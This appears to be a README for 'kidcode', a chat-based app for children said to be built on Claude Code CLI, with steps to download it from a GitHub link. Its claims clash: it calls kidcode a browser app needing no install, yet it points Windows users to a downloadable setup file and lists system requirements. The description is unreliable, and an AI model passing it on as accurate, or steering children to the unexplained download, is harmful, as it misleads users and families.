kidcode is a web app designed for kids to create projects using AI. It uses Claude Code CLI behind the scenes but gives kids an easy chat interface to build fun things. You don’t need any coding experience to use it. The app helps children learn and experiment with AI in a playful way.
kidcode runs in your web browser, so you don’t need to install anything complicated. It works on Windows computers with common modern web browsers.
- Chat-based interface made for kids
- Built on Claude Code CLI offering AI-powered coding
- Simple visual design with bright, clear buttons
- Safe and kid-friendly environment
- Works on most Windows browsers like Chrome and Edge
- Helps kids build coding skills with friendly AI support
- Visual design based on TailwindCSS and ShadCN UI for smooth experience
To use kidcode on Windows, check these requirements:
- A Windows PC running Windows 10 or later
- Internet connection for downloading and using the app
- Modern web browser like Google Chrome, Microsoft Edge, or Firefox
- At least 4GB of RAM for smooth performance
- Recommended screen resolution 1280x720 or higher
Follow these steps to start using kidcode on your Windows computer.
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Go to the kidcode download page:
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On this page, you will see options to download or access the web app.
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Click on the latest release or download link available for your system.
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Open the downloaded file or link to launch kidcode in your web browser.
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No installation is required. The app runs directly in your browser.
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Use the chat window to type what you want to create. The AI will help you with coding and building your project.
Visit this page to download the latest version or run the app online:
https://github.com/hymanmeek740/kidcode
Steps to launch kidcode for the first time:
- Open the download link in your browser.
- If available, download the kidcode setup file.
- If it is a web app link, click to open the app directly.
- Save shortcuts if you want quick access later.
- The app will open with a chat interface ready for your commands.
kidcode lets kids build projects by chatting with the AI. Here’s how to get going:
- Type a simple request in the chat box. For example, “Help me make a drawing app.”
- The AI will write code behind the scenes and guide you through steps.
- You can ask for explanations or tips if you don’t understand something.
- The interface is designed to be friendly and easy for kids to follow.
- Use the buttons and options displayed to customize your project.
- When done, you can save or share your creation.
kidcode uses a bright, colorful design made for kids:
- Big buttons with clear text
- Chat window with easy-to-read fonts
- Simple menus and step-by-step guidance
- TailwindCSS and ShadCN UI used for fast, smooth visuals
- Responsive layout works on many screen sizes
If you run into issues:
- Make sure your internet is working, as kidcode needs online access
- Use a supported browser (Chrome recommended)
- Refresh the page if something doesn’t load properly
- Restart your browser if the app behaves strangely
- Clear browser cache if problems persist
- Reach out on the GitHub page with details if you need help
To keep kidcode working well:
- Check the download page regularly for new releases.
- Download the newest version when available.
- Clear your browser cache if you notice old bugs or display issues after update.
- Restart your browser after update to see changes.
kidcode is built using these technologies:
- Next.js for creating the app’s web pages
- TypeScript for reliable programming
- TailwindCSS for easy styling
- Vibe Coding components to enhance UI
- Claude Code CLI for AI-assisted coding
kidcode aims to encourage kids to learn coding with help from AI in a safe environment.
If you want to report bugs, suggest features, or get support, visit the kidcode GitHub page:
https://github.com/hymanmeek740/kidcode